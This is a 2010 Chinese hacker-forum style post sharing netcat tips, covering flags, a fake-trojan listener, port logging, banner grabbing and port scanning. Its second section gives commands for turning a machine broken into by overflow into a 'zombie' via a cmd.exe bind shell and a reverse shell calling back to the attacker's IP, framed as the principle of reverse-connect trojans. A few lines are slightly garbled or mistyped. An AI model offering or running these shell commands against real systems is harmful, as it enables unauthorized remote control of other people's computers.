您的位置:首页 > 其它

[黑客必看]我用NC的心得

2010-02-25 19:00 127 查看
参数解释:
-e 程序重定向
-t 用telnet来回应
-l 监听本地端口
-p 指定本地端口
-v 获得端口信息
-vv 获得详细的端口信息
-z 关闭输入输出
-n 指定IP地址
-w 设定超时时间
-u UDP端口
我就知道这么些参数 了:
第一个:
nc -l -v -p 7626
这就是打开本地的7626端口进行监听,并反馈连接信息这样如果有扫描冰河木马的人会认为你中了木马开放了7626,和“小猪快跑”的功能有点象,再加个批处理文件一起用的话就是一个“小猪快跑”了.
如果要监视是否有入侵本地80端口的行为,并记下来,用这个命令:
nc -l -p 80 >>c://日志.dat
这样,凡是有针对本机80端口的攻击都会被记录下来的.
二、
如果你通过溢出进入了别人的机器,就可以运行:
nc -l -p 123 -e cmd.exe
或者是: nc -l -p 123 -t
作用都是以cmd.exe来响应到机器上123端口的连接.
这样就把溢出的主机变成了一台telnet肉鸡了!
你也可一用命令让肉鸡主动连接你的主机,假设我的IP是192.168.0.1 .
在肉鸡上运行: nc -e cmd.exe 192.168.0.1 777
再在本地机器上运行: nc -l -p 777
意思是让肉鸡将cmd.exe(就是个shell)主动响应到你电脑的777端口。
你再在本地机上监听777端口,这样就进入了对方的cmd了。
这也微十时毫 反弹端口式木马的原理了。
三、
用这个命令:
nc -v 192.168.0.25 80
就获得了192.168.0.25的80端口的信息。
可以获得IIS版本等很多重要信息 的 。
四、
你也可以将NC作为扫描器使用:
nc -v -z 192.168.0.25 1-100
扫描192.168.0.25的1到100间的TCP端口
用nc -v -z -u 192.168.0.25 1-100
这是扫描1到00间的UDP端口。
这些就是我这几天悟出来的。
大家还有心得什么没有啊!
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: